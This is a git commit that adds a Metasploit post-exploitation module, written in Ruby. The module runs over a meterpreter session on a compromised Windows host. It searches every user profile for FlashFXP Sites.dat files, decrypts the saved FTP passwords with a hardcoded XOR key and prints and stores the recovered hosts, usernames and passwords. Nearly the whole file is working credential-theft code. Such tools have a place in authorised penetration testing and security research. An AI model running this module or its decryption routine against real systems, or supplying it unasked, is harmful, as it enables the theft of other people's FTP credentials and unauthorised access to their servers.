Adds FlashFXP FTP Password Gathering post module by thelightcosine

git-svn-id: file:///home/svn/framework3/trunk@13040 4d416f70-5f16-0410-b530-b9f4589650da
2011-06-27 17:42:28 +00:00 · 2011-06-27 17:42:28 +00:00 · 0107d52d5b
parent 67403a5a22
commit 0107d52d5b
1 changed files with 116 additions and 0 deletions
--- a/modules/post/windows/gather/enum_flashfxp_pwd.rb
+++ b/modules/post/windows/gather/enum_flashfxp_pwd.rb
@ -0,0 +1,116 @@
+# $Id$
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex'
+require 'rex/parser/ini'
+
+class Metasploit3 < Msf::Post
+	include Msf::Post::Windows::Registry
+	include Msf::Auxiliary::Report
+
+	def initialize(info={})
+		super( update_info( info,
+				'Name'          => 'Windows Gather FlashFXP Saved Password Extraction',
+				'Description'   => %q{ This module extracts weakly encrypted saved FTP Passwords 
+					from FlashFXP. It finds saved FTP connections in the Sites.dat file. The 
+					passwords are saved in a weakly encrypted format which this module will 
+					decrypt. },
+				'License'       => MSF_LICENSE,
+				'Author'        => [ 'TheLightCosine <thelightcosine@gmail.com>'],
+				'Version'       => '$Revision$',
+				'Platform'      => [ 'windows' ],
+				'SessionTypes'  => [ 'meterpreter' ]
+			))
+
+	end
+
+	def run
+		@fxppaths = []
+		@userpaths = []
+		os = session.sys.config.sysinfo['OS']
+		drive = session.fs.file.expand_path("%SystemDrive%")
+		if os =~ /Windows 7|Vista|2008/
+			@appdata = '\\AppData\\Roaming\\FlashFXP\\'
+			@users = drive + '\\Users'
+			@userpaths << drive + '\\ProgramData\\FlashFXP\\'
+		else
+			@appdata = '\\Application Data\\FlashFXP\\'
+			@users = drive + '\\Documents and Settings'
+		end
+		get_users()
+		@userpaths.each{|up| get_ver_dirs(up)}
+		@fxppaths.each do |fxp|
+			get_ini(fxp)
+		end
+	end
+
+	def get_users
+		session.fs.dir.foreach(@users) do |path|
+			next if path =~ /^(\.|\.\.|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
+			@userpaths << "#{@users}\\#{path}\\#{@appdata}\\"
+		end
+	end
+
+	def get_ver_dirs(path)
+		begin
+			session.fs.dir.foreach(path) do |sub|
+				next if sub =~ /^(\.|\.\.)$/
+				@fxppaths << "#{path}#{sub}\\Sites.dat"
+			end
+		rescue
+			print_status("The following path could not be accessed or does not exist: #{path}")
+		end
+	end
+
+	def get_ini(filename)
+		begin
+			config = client.fs.file.new(filename,'r')
+			parse = config.read
+			ini = Rex::Parser::Ini.from_s(parse)
+			if ini == {}
+				print_status("Unable to parse file, may be encrypted using external password: #{filename}")
+			end
+			ini.each_key do |group|
+				host = ini[group]['IP']
+				username = ini[group]['user']
+				epass = ini[group]['pass']
+				port = ini[group]['port']
+				next if epass == nil or epass == ""
+				passwd = decrypt(epass)
+			
+				print_good("*** Host: #{host} Port: #{port} User: #{username}  Password: #{passwd} ***")
+				report_auth_info(
+							:host  => host,
+							:port => port,
+							:sname => 'FTP',
+							:user => username,
+							:pass => passwd
+						)
+			end
+		rescue
+			print_status("Either could not find or could not open file #{filename}")
+		end
+	end
+
+	def decrypt(pwd)
+		key =  "yA36zA48dEhfrvghGRg57h5UlDv3"
+		pass = ""
+		cipher = [pwd].pack("H*")
+
+		(0..(cipher.length)-2).each do |index|
+			xored = cipher[index + 1,1].unpack("C").first ^ key[index,1].unpack("C").first
+			if ((xored - cipher[index,1].unpack("C").first < 0))
+				xored += 255
+			end
+			pass << (xored - cipher[index,1].unpack("C").first).chr
+		end
+		return pass
+	end
+end